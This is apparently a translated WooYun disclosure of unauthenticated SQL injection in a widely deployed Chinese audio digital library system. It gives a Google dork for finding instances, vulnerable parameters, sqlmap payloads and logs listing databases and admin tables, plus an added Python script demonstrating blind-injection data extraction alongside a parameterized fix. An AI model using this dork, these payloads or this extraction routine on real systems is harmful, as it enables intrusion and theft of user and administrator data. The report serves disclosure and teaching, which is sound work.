
Vulnerability summary

Defect ID: wooyun-2014-065966

Title: Multiple SQL injections in a widely deployed library management system (no login required)

Related vendor: cncert (国家互联网应急中心, the National Internet Emergency Center, CNCERT/CC)

Author: magerx

Submitted: 2014-06-26 11:27

Fix deadline: 2014-09-24 11:28

Public disclosure: 2014-09-24 11:28

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to third-party partner organization (cncert 国家互联网应急中心) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-06-26: Details sent to the vendor; awaiting vendor handling
2014-06-30: Vendor confirmed; details visible to the vendor only
2014-07-03: Details opened to third-party security partners
2014-08-24: Details opened to core white hats and domain experts
2014-09-03: Details opened to regular white hats
2014-09-13: Details opened to intern white hats
2014-09-24: Details disclosed to the public

Summary:

See title.

Details:

Earlier reports on the same product:

WooYun: Three SQL injections in a widely deployed library system (no login required)
WooYun: SQL injection vulnerability in a widely deployed library system


Vendor:
盛大天方有声数字图书馆 (Shanda Tianfang Audio Digital Library)
Search (Google dork for deployed instances):

intitle:天方有声数字图书馆


Injection points:

http://target/showContent.aspx?id=6


sqlmap identified the following injection points with a total of 97 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 3626=3626
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=6; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=6 WAITFOR DELAY '0:0:5'--
---
[14:45:01] [INFO] testing Microsoft SQL Server
[14:45:01] [INFO] confirming Microsoft SQL Server
[14:45:01] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


http://target/user_remark_add.aspx?bookid=2


sqlmap identified the following injection points with a total of 53 HTTP(s) requests:
---
Place: GET
Parameter: bookid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bookid=12 AND 7717=7717-- sUwa
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: bookid=12; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: bookid=12 WAITFOR DELAY '0:0:5'--
---


Proof of vulnerability:

Current database user:

[14:46:48] [INFO] fetching current user
[14:46:48] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:46:48] [INFO] retrieved: NT AUTHORITY\NETWORK SERVICE
current user: 'NT AUTHORITY\\NETWORK SERVICE'


Databases and tables:

[15:28:55] [INFO] fetching database names
[15:28:55] [INFO] fetching number of databases
[15:28:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:28:55] [INFO] retrieved: 11
[15:28:56] [INFO] retrieved: CNCAudioLib_M
[15:29:01] [INFO] retrieved: CNCAudioLib_SD
[15:29:07] [INFO] retrieved: HyServices02
[15:29:13] [INFO] retrieved: master
[15:29:15] [INFO] retrieved: model
[15:29:18] [INFO] retrieved: msdb
[15:29:20] [INFO] retrieved: Northwind
[15:29:24] [INFO] retrieved: pubs
[15:29:26] [INFO] retrieved: ssreadervideo
[15:29:32] [INFO] retrieved: tempdb
[15:29:34] [INFO] retrieved: TingBookLan
[15:29:39] [INFO] fetching tables for databases: CNCAudioLib_M, CNCAudioLib_SD, HyServices02, Northwind, TingBookLan, master, model, msdb, pubs, ssreadervideo, tempdb
[15:29:39] [INFO] skipping system database 'tempdb'
[15:29:39] [INFO] fetching number of tables for database 'TingBookLan'
[15:29:39] [INFO] retrieved: 15
[15:29:40] [INFO] retrieved: dbo.AdminUser
[15:29:46] [INFO] retrieved: dbo.BookTree
[15:29:50] [INFO] retrieved: dbo.BookTreeS
[15:30:15] [INFO] retrieved: dbo.dtproperties
[15:30:21] [INFO] retrieved: dbo.sysconstraints
[15:30:28] [INFO] retrieved: dbo.syssegments
[15:30:32] [INFO] retrieved: dbo.User
[15:30:35] [INFO] retrieved: dbo.user_ips
[15:30:39] [INFO] retrieved: dbo.user_readnums
[15:30:44] [INFO] retrieved: dbo.user_tongji
[15:30:48] [INFO] retrieved: dbo.UserDownLog
[15:30:53] [INFO] retrieved: dbo.UserFavLog
[15:30:57] [INFO] retrieved: dbo.UserListenLog
[15:31:02] [INFO] retrieved: dbo.UserMessageLog
[15:31:07] [INFO] retrieved: dbo.UserRemarkLog
[15:31:12] [INFO] fetching number of tables for database 'CNCAudioLib_SD'
[15:31:12] [INFO] retrieved: 25
[15:31:13] [INFO] retrieved: dbo.AdminUser
[15:31:19] [INFO] retrieved: dbo.BookClass
[15:31:24] [INFO] retrieved: dbo.BookHot
[15:31:26] [INFO] retrieved: dbo.BookPrice
[15:31:33] [INFO] retrieved: dbo.BookTree
[15:31:35] [INFO] retrieved: dbo.BookTreeStat
[15:31:39] [INFO] retrieved: dbo.dtproperties
[15:31:45] [INFO] retrieved: dbo.sysconstraints
[15:31:52] [INFO] retrieved: dbo.syssegments
[15:31:56] [INFO] retrieved: dbo.User
[15:31:59] [INFO] retrieved: dbo.User_Group
[15:32:03] [INFO] retrieved: dbo.user_ips
[15:32:07] [INFO] retrieved: dbo.user_pays
[15:32:10] [INFO] retrieved: dbo.user_readnums
[15:32:15] [INFO] retrieved: dbo.User_ServerType
[15:32:22] [INFO] retrieved: dbo.user_tongji
[15:32:28] [INFO] retrieved: dbo.UserCards
[15:32:33] [INFO] retrieved: dbo.UserFavLog
[15:32:37] [INFO] retrieved: dbo.UserJFLog
[15:32:40] [INFO] retrieved: dbo.UserListenLog
[15:32:45] [INFO] retrieved: dbo.UserLoginLog
[15:32:50] [INFO] retrieved: dbo.UserMes
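Both sqlmap runs above are boolean-based blind: sqlmap sends the page a condition that is true (id=6 AND 3626=3626) and one that is false, checks whether the response changes, and then reads out values such as the current user and the table names one character at a time, each character found by binary search on its code point. The script below, an added example that is neither the vendor's code nor sqlmap's, reproduces that loop against a constructed in-memory SQLite stand-in for showContent.aspx that concatenates the id parameter into its query, and shows the same oracle failing against a version that validates and binds the parameter. The BookTree row, the AdminUser table and its contents, and the page functions are all assumptions for illustration. SQLite has no WAITFOR DELAY and refuses stacked statements, so the time-based and stacked-query vectors in the sqlmap output are not simulated here; on Microsoft SQL Server 2000 stacked queries mean the attacker can execute arbitrary statements through this parameter, not merely read data.

```python
"""Boolean-based blind SQL injection, as sqlmap drove it above, against a
constructed SQLite stand-in for showContent.aspx?id=. Added example; not the
vendor's code. Table names and row contents are assumptions for illustration."""
import sqlite3


def make_vulnerable_page():
    """Return page(id_param) -> HTML that concatenates id into the query (the bug)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE BookTree (id INTEGER PRIMARY KEY, title TEXT);   -- constructed
        INSERT INTO BookTree VALUES (6, 'Sample audiobook');
        CREATE TABLE AdminUser (username TEXT, password TEXT);        -- constructed
        INSERT INTO AdminUser VALUES ('admin', 'constructed-secret');
    """)

    def page(id_param):
        sql = "SELECT title FROM BookTree WHERE id=" + id_param     # unparameterized
        try:
            row = conn.execute(sql).fetchone()
        except sqlite3.Error:
            return "<h1>Server Error</h1>"                          # the generic error page
        return "<h1>%s</h1>" % (row[0] if row else "not found")
    return page


def make_fixed_page():
    """Same page with the parameter validated and bound; injection has no effect."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE BookTree (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO BookTree VALUES (6, 'Sample audiobook');
    """)

    def page(id_param):
        try:
            book_id = int(id_param)          # reject anything that is not an integer
        except ValueError:
            return "<h1>Bad Request</h1>"
        row = conn.execute("SELECT title FROM BookTree WHERE id=?", (book_id,)).fetchone()
        return "<h1>%s</h1>" % (row[0] if row else "not found")
    return page


def is_true(page, condition):
    """The blind oracle: a true condition leaves the page identical to the baseline."""
    return page("6 AND (%s)" % condition) == page("6")


def confirm_injectable(page):
    """sqlmap's check: a tautology must keep the row, a contradiction must drop it."""
    return is_true(page, "3626=3626") and not is_true(page, "3626=3627")


def extract_string(page, expr, max_len=64):
    """Read the value of a SQL expression one character at a time via the oracle.
    SQLite functions used: length(), substr(), unicode(). The MSSQL 2000
    equivalents sqlmap would send are LEN(), SUBSTRING() and ASCII()."""
    out = ""
    for pos in range(1, max_len + 1):
        if not is_true(page, "length(%s)>=%d" % (expr, pos)):
            break                            # past the end of the string
        lo, hi = 0, 127                      # binary search the code point: 7 requests per char
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(page, "unicode(substr(%s,%d,1))>%d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    vuln = make_vulnerable_page()
    print("injectable:", confirm_injectable(vuln))
    print("admin user:", extract_string(vuln, "(SELECT username FROM AdminUser)"))
    print("fixed page injectable:", confirm_injectable(make_fixed_page()))
```

Each extracted character costs about eight requests (one length probe plus seven comparisons), which is why sqlmap's log above advances a few seconds per table name when run single-threaded. On SQL Server the same loop applied to SYSTEM_USER is how the login 'NT AUTHORITY\NETWORK SERVICE' came back: the application connects with Windows authentication as the IIS worker process account, so the database sees the web server's identity rather than a restricted application login.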

Fix suggestion:

00

Copyright notice: when reposting, please credit the source as magerx@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-06-30 22:15

Vendor reply:

CNVD confirmed and reproduced the described issue, and has notified the software vendor, Shanda Tianfang (盛大天方), through public contact channels: by telephone at 010 6561 **** (transferred to Tianfang's technical staff), after which the notification was sent to the zrtxs*** mailbox.

Latest status:

None